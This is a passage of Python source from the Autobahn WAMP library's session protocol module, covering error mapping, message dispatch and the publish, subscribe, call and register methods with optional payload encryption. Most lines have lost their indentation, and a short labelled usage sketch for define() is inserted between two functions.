error = self._ecls_to_uri_pat[exc.__class__][0]._uri
else:
error = u"wamp.error.runtime_error"
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(False, error, args, kwargs)
if encrypted_payload:
msg = message.Error(request_type,
request,
error,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
msg = message.Error(request_type,
request,
error,
args,
kwargs)
return msg
def _exception_from_message(self, msg):
"""
Create a user (or generic) exception from a WAMP error message.
:param msg: A WAMP error message.
:type msg: instance of :class:`autobahn.wamp.message.Error`
"""
# FIXME:
# 1. map to ecls based on error URI wildcard/prefix
# 2. extract additional args/kwargs from error URI
exc = None
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg, enc_algo=msg.enc_algo)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_error, msg.args, msg.kwargs = self._keyring.decrypt(True, msg.error, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload 1: {err}", err=e)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
u"failed to decrypt application payload 1: {}".format(e),
enc_algo=msg.enc_algo,
)
else:
if msg.error != decrypted_error:
self.log.warn(
u"URI within encrypted payload ('{decrypted_error}') does not match the envelope ('{error}')",
decrypted_error=decrypted_error,
error=msg.error,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_error, msg.error),
enc_algo=msg.enc_algo,
)
if enc_err:
return enc_err
if msg.error in self._uri_to_ecls:
ecls = self._uri_to_ecls[msg.error]
try:
# the following might fail, eg. TypeError when
# signature of exception constructor is incompatible
# with args/kwargs or when the exception constructor raises
if msg.kwargs:
if msg.args:
exc = ecls(*msg.args, **msg.kwargs)
else:
exc = ecls(**msg.kwargs)
else:
if msg.args:
exc = ecls(*msg.args)
else:
exc = ecls()
except Exception:
try:
self.onUserError(
txaio.create_failure(),
"While re-constructing exception",
)
except:
pass
if not exc:
# the following ctor never fails ..
if msg.kwargs:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args, **msg.kwargs)
else:
exc = exception.ApplicationError(msg.error, **msg.kwargs)
else:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args)
else:
exc = exception.ApplicationError(msg.error)
if hasattr(exc, 'enc_algo'):
exc.enc_algo = msg.enc_algo
return exc
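# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): mapping an
# application-defined exception to a WAMP error URI with define(), so that
# _message_from_exception() / _exception_from_message() above can translate
# it in both directions. The exception class and URI are hypothetical.
# ---------------------------------------------------------------------------

class _ExampleAppError(Exception):
    pass


def _example_define(session):
    # after this call, raising _ExampleAppError inside a registered procedure
    # is sent to the caller as a WAMP ERROR with the given URI, and a received
    # ERROR carrying that URI is re-raised as _ExampleAppError locally
    session.define(_ExampleAppError, u'com.example.error.example')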
class ApplicationSession(BaseSession):
"""
WAMP endpoint session.
"""
log = txaio.make_logger()
def __init__(self, config=None):
"""
Constructor.
"""
BaseSession.__init__(self)
self.config = config or types.ComponentConfig(realm=u"default")
self._transport = None
self._session_id = None
self._realm = None
self._goodbye_sent = False
self._transport_is_closing = False
# outstanding requests
self._publish_reqs = {}
self._subscribe_reqs = {}
self._unsubscribe_reqs = {}
self._call_reqs = {}
self._register_reqs = {}
self._unregister_reqs = {}
# subscriptions in place
self._subscriptions = {}
# registrations in place
self._registrations = {}
# incoming invocations
self._invocations = {}
def set_keyring(self, keyring):
"""
"""
self._keyring = keyring
def onOpen(self, transport):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onOpen`
"""
self._transport = transport
d = self.fire('connect', self, transport)
txaio.add_callbacks(
d, None,
lambda fail: self._swallow_error(fail, "While notifying 'connect'")
)
txaio.add_callbacks(
d,
lambda _: txaio.as_future(self.onConnect),
None,
)
def onConnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onConnect`
"""
self.join(self.config.realm)
def join(self, realm, authmethods=None, authid=None, authrole=None, authextra=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.join`
"""
# FIXME
if six.PY2 and type(realm) == str:
realm = six.u(realm)
if six.PY2 and type(authid) == str:
authid = six.u(authid)
if six.PY2 and type(authrole) == str:
authrole = six.u(authrole)
if self._session_id:
raise Exception("already joined")
# store the realm requested by client, though this might be overwritten later,
# when realm redirection kicks in
self._realm = realm
# closing handshake state
self._goodbye_sent = False
# send HELLO message to router
msg = message.Hello(realm, role.DEFAULT_CLIENT_ROLES, authmethods, authid, authrole, authextra)
self._transport.send(msg)
def disconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.disconnect`
"""
if self._transport:
self._transport.close()
def is_connected(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_connected`
"""
return self._transport is not None
def is_attached(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_attached`
"""
return self._session_id is not None
def onUserError(self, fail, msg):
"""
This is called when we try to fire a callback, but get an
exception from user code -- for example, a registered publish
callback or a registered method. By default, this prints the
current stack-trace and then error-message to stdout.
ApplicationSession-derived objects may override this to
provide logging if they prefer. The Twisted implementation does
this. (See :class:`autobahn.twisted.wamp.ApplicationSession`)
:param fail: instance implementing txaio.IFailedFuture
:param msg: an informative message from the library. It is
suggested you log this immediately after the exception.
"""
if isinstance(fail.value, exception.ApplicationError):
# silence on errors raised explicitly from the app
# previous code: self.log.error(fail.value.error_message())
pass
else:
self.log.error(
u'{msg}: {traceback}',
msg=msg,
traceback=txaio.failure_format_traceback(fail),
)
def _swallow_error(self, fail, msg):
'''
This is an internal generic error-handler for errors encountered
when calling down to on*() handlers that can reasonably be
expected to be overridden in user code.
Note that it *cancels* the error, so use with care!
Specifically, this should *never* be added to the errback
chain for a Deferred/coroutine that will make it out to user
code.
'''
try:
self.onUserError(fail, msg)
except Exception:
self.log.error(
"Internal error: {tb}",
tb=txaio.failure_format_traceback(txaio.create_failure()),
)
return None
def onMessage(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onMessage`
"""
if self._session_id is None:
# the first message must be WELCOME, ABORT or CHALLENGE ..
if isinstance(msg, message.Welcome):
if msg.realm:
self._realm = msg.realm
self._session_id = msg.session
details = SessionDetails(self._realm, self._session_id, msg.authid, msg.authrole, msg.authmethod, msg.authprovider, msg.authextra)
# firing 'join' *before* running onJoin, so that the
# idiom where you "do stuff" in onJoin -- possibly
# including self.leave() -- works properly. Besides,
# there's "ready" that fires after 'join' and onJoin
# have all completed...
d = self.fire('join', self, details)
# add a logging errback first, which will ignore any
# errors from fire()
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While notifying 'join'")
)
# this should run regardless
txaio.add_callbacks(
d,
lambda _: txaio.as_future(self.onJoin, details),
None
)
# ignore any errors from onJoin (XXX or, should that be fatal?)
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While firing onJoin")
)
# this instance is now "ready"...
txaio.add_callbacks(
d,
lambda _: self.fire('ready', self),
None
)
# ignore any errors from 'ready'
txaio.add_callbacks(
d, None,
lambda e: self._swallow_error(e, "While notifying 'ready'")
)
elif isinstance(msg, message.Abort):
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
elif isinstance(msg, message.Challenge):
challenge = types.Challenge(msg.method, msg.extra)
d = txaio.as_future(self.onChallenge, challenge)
def success(signature):
if signature is None:
raise Exception('onChallenge user callback did not return a signature')
if type(signature) == six.binary_type:
signature = signature.decode('utf8')
if type(signature) != six.text_type:
raise Exception('signature must be unicode (was {})'.format(type(signature)))
reply = message.Authenticate(signature)
self._transport.send(reply)
def error(err):
self.onUserError(err, "Authentication failed")
reply = message.Abort(u"wamp.error.cannot_authenticate", u"{0}".format(err.value))
self._transport.send(reply)
# fire callback and close the transport
details = types.CloseDetails(reply.reason, reply.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
# switching to the callback chain, effectively
# cancelling error (which we've now handled)
return d
txaio.add_callbacks(d, success, error)
else:
raise ProtocolError("Received {0} message, and session is not yet established".format(msg.__class__))
else:
# self._session_id != None (aka "session established")
if isinstance(msg, message.Goodbye):
if not self._goodbye_sent:
# the peer wants to close: send GOODBYE reply
reply = message.Goodbye()
self._transport.send(reply)
self._session_id = None
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
errmsg = 'While firing onLeave for reason "{0}" and message "{1}"'.format(msg.reason, msg.message)
return self._swallow_error(e, errmsg)
txaio.add_callbacks(d, success, _error)
elif isinstance(msg, message.Event):
if msg.subscription in self._subscriptions:
# fire all event handlers on subscription ..
for subscription in self._subscriptions[msg.subscription]:
handler = subscription.handler
topic = msg.topic or subscription.topic
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
# FIXME: behavior in error cases (no keyring, decrypt issues, URI mismatch, ..)
if not self._keyring:
self.log.warn("received encrypted payload, but no keyring active - ignoring encrypted payload!")
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_topic, msg.args, msg.kwargs = self._keyring.decrypt(False, topic, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload: {error}", error=e)
else:
if topic != decrypted_topic:
self.log.warn("envelope topic URI does not match encrypted one")
invoke_args = (handler.obj,) if handler.obj else tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if handler.details_arg:
invoke_kwargs[handler.details_arg] = types.EventDetails(publication=msg.publication, publisher=msg.publisher, publisher_authid=msg.publisher_authid, publisher_authrole=msg.publisher_authrole, topic=topic, enc_algo=msg.enc_algo)
def _error(e):
errmsg = 'While firing {0} subscribed under {1}.'.format(
handler.fn, msg.subscription)
return self._swallow_error(e, errmsg)
future = txaio.as_future(handler.fn, *invoke_args, **invoke_kwargs)
txaio.add_callbacks(future, None, _error)
else:
raise ProtocolError("EVENT received for non-subscribed subscription ID {0}".format(msg.subscription))
elif isinstance(msg, message.Published):
if msg.request in self._publish_reqs:
# get and pop outstanding publish request
publish_request = self._publish_reqs.pop(msg.request)
# create a new publication object
publication = Publication(msg.publication, was_encrypted=publish_request.was_encrypted)
# resolve deferred/future for publishing successfully
txaio.resolve(publish_request.on_reply, publication)
else:
raise ProtocolError("PUBLISHED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Subscribed):
if msg.request in self._subscribe_reqs:
# get and pop outstanding subscribe request
request = self._subscribe_reqs.pop(msg.request)
# create new handler subscription list for subscription ID if not yet tracked
if msg.subscription not in self._subscriptions:
self._subscriptions[msg.subscription] = []
subscription = Subscription(msg.subscription, request.topic, self, request.handler)
# add handler to existing subscription
self._subscriptions[msg.subscription].append(subscription)
# resolve deferred/future for subscribing successfully
txaio.resolve(request.on_reply, subscription)
else:
raise ProtocolError("SUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unsubscribed):
if msg.request in self._unsubscribe_reqs:
# get and pop outstanding subscribe request
request = self._unsubscribe_reqs.pop(msg.request)
# if the subscription still exists, mark as inactive and remove ..
if request.subscription_id in self._subscriptions:
for subscription in self._subscriptions[request.subscription_id]:
subscription.active = False
del self._subscriptions[request.subscription_id]
# resolve deferred/future for unsubscribing successfully
txaio.resolve(request.on_reply, 0)
else:
raise ProtocolError("UNSUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Result):
if msg.request in self._call_reqs:
call_request = self._call_reqs[msg.request]
proc = call_request.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(True, proc, encrypted_payload)
except Exception as e:
self.log.warn(
"failed to decrypt application payload 1: {err}",
err=e,
)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
u"failed to decrypt application payload 1: {}".format(e),
)
else:
if proc != decrypted_proc:
self.log.warn(
"URI within encrypted payload ('{decrypted_proc}') does not match the envelope ('{proc}')",
decrypted_proc=decrypted_proc,
proc=proc,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc),
)
if msg.progress:
# process progressive call result
if call_request.options.on_progress:
if enc_err:
self.onUserError(enc_err, "could not deliver progressive call result, because payload decryption failed")
else:
kw = msg.kwargs or dict()
args = msg.args or tuple()
try:
# XXX what if on_progress returns a Deferred/Future?
call_request.options.on_progress(*args, **kw)
except Exception:
try:
self.onUserError(txaio.create_failure(), "While firing on_progress")
except:
pass
else:
# process final call result
# drop original request
del self._call_reqs[msg.request]
# user callback that gets fired
on_reply = call_request.on_reply
# above might already have rejected, so we guard ..
if enc_err:
txaio.reject(on_reply, enc_err)
else:
if msg.kwargs:
if msg.args:
res = types.CallResult(*msg.args, **msg.kwargs)
else:
res = types.CallResult(**msg.kwargs)
txaio.resolve(on_reply, res)
else:
if msg.args:
if len(msg.args) > 1:
res = types.CallResult(*msg.args)
txaio.resolve(on_reply, res)
else:
txaio.resolve(on_reply, msg.args[0])
else:
txaio.resolve(on_reply, None)
else:
raise ProtocolError("RESULT received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Invocation):
if msg.request in self._invocations:
raise ProtocolError("INVOCATION received for request ID {0} already invoked".format(msg.request))
else:
if msg.registration not in self._registrations:
raise ProtocolError("INVOCATION received for non-registered registration ID {0}".format(msg.registration))
else:
registration = self._registrations[msg.registration]
endpoint = registration.endpoint
proc = msg.procedure or registration.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted INVOCATION payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(False, proc, encrypted_payload)
except Exception as e:
self.log.warn(
"failed to decrypt INVOCATION payload: {err}",
err=e,
)
enc_err = ApplicationError(
ApplicationError.ENC_DECRYPT_ERROR,
"failed to decrypt INVOCATION payload: {}".format(e),
)
else:
if proc != decrypted_proc:
self.log.warn(
"URI within encrypted INVOCATION payload ('{decrypted_proc}') "
"does not match the envelope ('{proc}')",
decrypted_proc=decrypted_proc,
proc=proc,
)
enc_err = ApplicationError(
ApplicationError.ENC_TRUSTED_URI_MISMATCH,
u"URI within encrypted INVOCATION payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc),
)
if enc_err:
# when there was a problem decrypting the INVOCATION payload, we obviously can't invoke
# the endpoint, and instead return an ERROR message to the caller
reply = self._message_from_exception(message.Invocation.MESSAGE_TYPE, msg.request, enc_err)
self._transport.send(reply)
else:
if endpoint.obj is not None:
invoke_args = (endpoint.obj,)
else:
invoke_args = tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if endpoint.details_arg:
if msg.receive_progress:
def progress(*args, **kwargs):
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
raise Exception(u"trying to send encrypted payload, but no keyring active")
encrypted_payload = self._keyring.encrypt(False, proc, args, kwargs)
if encrypted_payload:
progress_msg = message.Yield(msg.request,
payload=encrypted_payload.payload,
progress=True,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
progress_msg = message.Yield(msg.request,
args=args,
kwargs=kwargs,
progress=True)
self._transport.send(progress_msg)
else:
progress = None
invoke_kwargs[endpoint.details_arg] = types.CallDetails(progress, caller=msg.caller, caller_authid=msg.caller_authid, caller_authrole=msg.caller_authrole, procedure=proc, enc_algo=msg.enc_algo)
on_reply = txaio.as_future(endpoint.fn, *invoke_args, **invoke_kwargs)
def success(res):
del self._invocations[msg.request]
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"trying to send encrypted payload, but no keyring active"
self.log.warn(log_msg)
else:
try:
if isinstance(res, types.CallResult):
encrypted_payload = self._keyring.encrypt(False, proc, res.results, res.kwresults)
else:
encrypted_payload = self._keyring.encrypt(False, proc, [res])
except Exception as e:
self.log.warn(
"failed to encrypt application payload: {err}",
err=e,
)
if encrypted_payload:
reply = message.Yield(msg.request,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if isinstance(res, types.CallResult):
reply = message.Yield(msg.request,
args=res.results,
kwargs=res.kwresults)
else:
reply = message.Yield(msg.request,
args=[res])
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'success return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
def error(err):
del self._invocations[msg.request]
errmsg = txaio.failure_message(err)
try:
self.onUserError(err, errmsg)
except:
pass
formatted_tb = None
if self.traceback_app:
formatted_tb = txaio.failure_format_traceback(err)
reply = self._message_from_exception(
message.Invocation.MESSAGE_TYPE,
msg.request,
err.value,
formatted_tb,
msg.enc_algo
)
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'error return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
# we have handled the error, so we eat it
return None
self._invocations[msg.request] = InvocationRequest(msg.request, on_reply)
txaio.add_callbacks(on_reply, success, error)
elif isinstance(msg, message.Interrupt):
if msg.request not in self._invocations:
raise ProtocolError("INTERRUPT received for non-pending invocation {0}".format(msg.request))
else:
# noinspection PyBroadException
try:
self._invocations[msg.request].cancel()
except Exception:
# XXX can .cancel() return a Deferred/Future?
try:
self.onUserError(
txaio.create_failure(),
"While cancelling call.",
)
except:
pass
finally:
del self._invocations[msg.request]
elif isinstance(msg, message.Registered):
if msg.request in self._register_reqs:
# get and pop outstanding register request
request = self._register_reqs.pop(msg.request)
# create new registration if not yet tracked
if msg.registration not in self._registrations:
registration = Registration(self, msg.registration, request.procedure, request.endpoint)
self._registrations[msg.registration] = registration
else:
raise ProtocolError("REGISTERED received for already existing registration ID {0}".format(msg.registration))
txaio.resolve(request.on_reply, registration)
else:
raise ProtocolError("REGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unregistered):
if msg.request in self._unregister_reqs:
# get and pop outstanding subscribe request
request = self._unregister_reqs.pop(msg.request)
# if the registration still exists, mark as inactive and remove ..
if request.registration_id in self._registrations:
self._registrations[request.registration_id].active = False
del self._registrations[request.registration_id]
# resolve deferred/future for unregistering successfully
txaio.resolve(request.on_reply)
else:
raise ProtocolError("UNREGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Error):
# remove outstanding request and get the reply deferred/future
on_reply = None
# ERROR reply to CALL
if msg.request_type == message.Call.MESSAGE_TYPE and msg.request in self._call_reqs:
on_reply = self._call_reqs.pop(msg.request).on_reply
# ERROR reply to PUBLISH
elif msg.request_type == message.Publish.MESSAGE_TYPE and msg.request in self._publish_reqs:
on_reply = self._publish_reqs.pop(msg.request).on_reply
# ERROR reply to SUBSCRIBE
elif msg.request_type == message.Subscribe.MESSAGE_TYPE and msg.request in self._subscribe_reqs:
on_reply = self._subscribe_reqs.pop(msg.request).on_reply
# ERROR reply to UNSUBSCRIBE
elif msg.request_type == message.Unsubscribe.MESSAGE_TYPE and msg.request in self._unsubscribe_reqs:
on_reply = self._unsubscribe_reqs.pop(msg.request).on_reply
# ERROR reply to REGISTER
elif msg.request_type == message.Register.MESSAGE_TYPE and msg.request in self._register_reqs:
on_reply = self._register_reqs.pop(msg.request).on_reply
# ERROR reply to UNREGISTER
elif msg.request_type == message.Unregister.MESSAGE_TYPE and msg.request in self._unregister_reqs:
on_reply = self._unregister_reqs.pop(msg.request).on_reply
if on_reply:
txaio.reject(on_reply, self._exception_from_message(msg))
else:
raise ProtocolError("WampAppSession.onMessage(): ERROR received for non-pending request_type {0} and request ID {1}".format(msg.request_type, msg.request))
else:
raise ProtocolError("Unexpected message {0}".format(msg.__class__))
# noinspection PyUnusedLocal
def onClose(self, wasClean):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onClose`
"""
self._transport = None
if self._session_id:
# fire callback and close the transport
details = types.CloseDetails(
reason=types.CloseDetails.REASON_TRANSPORT_LOST,
message=(u"WAMP transport was lost without closing the"
u" session before"),
)
d = txaio.as_future(self.onLeave, details)
def success(arg):
# XXX also: handle async
self.fire('leave', self, details)
return arg
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, success, _error)
self._session_id = None
d = txaio.as_future(self.onDisconnect)
def success(arg):
# XXX do we care about returning 'arg' properly?
return self.fire('disconnect', self, was_clean=wasClean)
def _error(e):
return self._swallow_error(e, "While firing onDisconnect")
txaio.add_callbacks(d, None, _error)
def onChallenge(self, challenge):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onChallenge`
"""
raise Exception("received authentication challenge, but onChallenge not implemented")
def onJoin(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onJoin`
"""
def onLeave(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onLeave`
"""
if details.reason.startswith('wamp.error.'):
self.log.error('{reason}: {wamp_message}', reason=details.reason, wamp_message=details.message)
if self._transport:
self.disconnect()
# do we ever call onLeave with a valid transport?
def leave(self, reason=None, log_message=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.leave`
"""
if not self._session_id:
raise SessionNotReady(u"session hasn't joined a realm")
if not self._goodbye_sent:
if not reason:
reason = u"wamp.close.normal"
msg = wamp.message.Goodbye(reason=reason, message=log_message)
self._transport.send(msg)
self._goodbye_sent = True
# deferred that fires when transport actually hits CLOSED
is_closed = self._transport is None or self._transport.is_closed
return is_closed
else:
raise SessionNotReady(u"session was alread requested to leave")
def onDisconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onDisconnect`
"""
pass # return self.fire('disconnect', self, True)
def publish(self, topic, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.IPublisher.publish`
"""
if six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(type(topic) == six.text_type)
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.PublishOptions):
raise Exception("options must be of type a.w.t.PublishOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, topic, args, kwargs)
if encrypted_payload:
if options:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs)
if options and options.acknowledge:
# only acknowledged publications expect a reply ..
on_reply = txaio.create_future()
self._publish_reqs[request_id] = PublishRequest(request_id, on_reply, was_encrypted=(encrypted_payload is not None))
else:
on_reply = None
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to set up a PublishRequest() in _publish_reqs _before_
# calling transport.send(), because a mock- or side-by-side transport
# will immediately lead to an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except Exception as e:
if request_id in self._publish_reqs:
del self._publish_reqs[request_id]
raise e
return on_reply
def subscribe(self, handler, topic=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISubscriber.subscribe`
"""
assert((callable(handler) and topic is not None) or hasattr(handler, '__class__'))
if topic and six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(topic is None or type(topic) == six.text_type)
assert(options is None or isinstance(options, types.SubscribeOptions))
if not self._transport:
raise exception.TransportLost()
def _subscribe(obj, fn, topic, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
handler_obj = Handler(fn, obj, options.details_arg if options else None)
self._subscribe_reqs[request_id] = SubscribeRequest(request_id, topic, on_reply, handler_obj)
if options:
msg = message.Subscribe(request_id, topic, **options.message_attr())
else:
msg = message.Subscribe(request_id, topic)
self._transport.send(msg)
return on_reply
if callable(handler):
# subscribe a single handler
return _subscribe(None, handler, topic, options)
else:
# subscribe all methods on an object decorated with "wamp.subscribe"
on_replies = []
for k in inspect.getmembers(handler.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_handler():
uri = pat.uri()
subopts = options or pat.subscribe_options()
on_replies.append(_subscribe(handler, proc, uri, subopts))
# XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
def _unsubscribe(self, subscription):
"""
Called from :meth:`autobahn.wamp.protocol.Subscription.unsubscribe`
"""
assert(isinstance(subscription, Subscription))
assert subscription.active
assert(subscription.id in self._subscriptions)
assert(subscription in self._subscriptions[subscription.id])
if not self._transport:
raise exception.TransportLost()
# remove handler subscription and mark as inactive
self._subscriptions[subscription.id].remove(subscription)
subscription.active = False
# number of handler subscriptions left ..
scount = len(self._subscriptions[subscription.id])
if scount == 0:
# if the last handler was removed, unsubscribe from broker ..
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unsubscribe_reqs[request_id] = UnsubscribeRequest(request_id, on_reply, subscription.id)
msg = message.Unsubscribe(request_id, subscription.id)
self._transport.send(msg)
return on_reply
else:
# there are still handlers active on the subscription!
return txaio.create_future_success(scount)
def call(self, procedure, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.ICaller.call`
"""
if six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(isinstance(procedure, six.text_type))
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.CallOptions):
raise Exception("options must be of type a.w.t.CallOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, procedure, args, kwargs)
if encrypted_payload:
if options:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs)
# FIXME: implement call canceling
# def canceller(_d):
# cancel_msg = message.Cancel(request)
# self._transport.send(cancel_msg)
# d = Deferred(canceller)
on_reply = txaio.create_future()
self._call_reqs[request_id] = CallRequest(request_id, procedure, on_reply, options)
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
# * we have to set up a CallRequest() in _call_reqs _before_
# calling transport.send(), because a mock- or side-by-side transport
# will immediately lead to an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except:
if request_id in self._call_reqs:
del self._call_reqs[request_id]
raise
return on_reply
def register(self, endpoint, procedure=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ICallee.register`
"""
assert((callable(endpoint) and procedure is not None) or hasattr(endpoint, '__class__'))
if procedure and six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(procedure is None or type(procedure) == six.text_type)
assert(options is None or isinstance(options, types.RegisterOptions))
if not self._transport:
raise exception.TransportLost()
def _register(obj, fn, procedure, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
endpoint_obj = Endpoint(fn, obj, options.details_arg if options else None)
self._register_reqs[request_id] = RegisterRequest(request_id, on_reply, procedure, endpoint_obj)
if options:
msg = message.Register(request_id, procedure, **options.message_attr())
else:
msg = message.Register(request_id, procedure)
self._transport.send(msg)
return on_reply
if callable(endpoint):
# register a single callable
return _register(None, endpoint, procedure, options)
else:
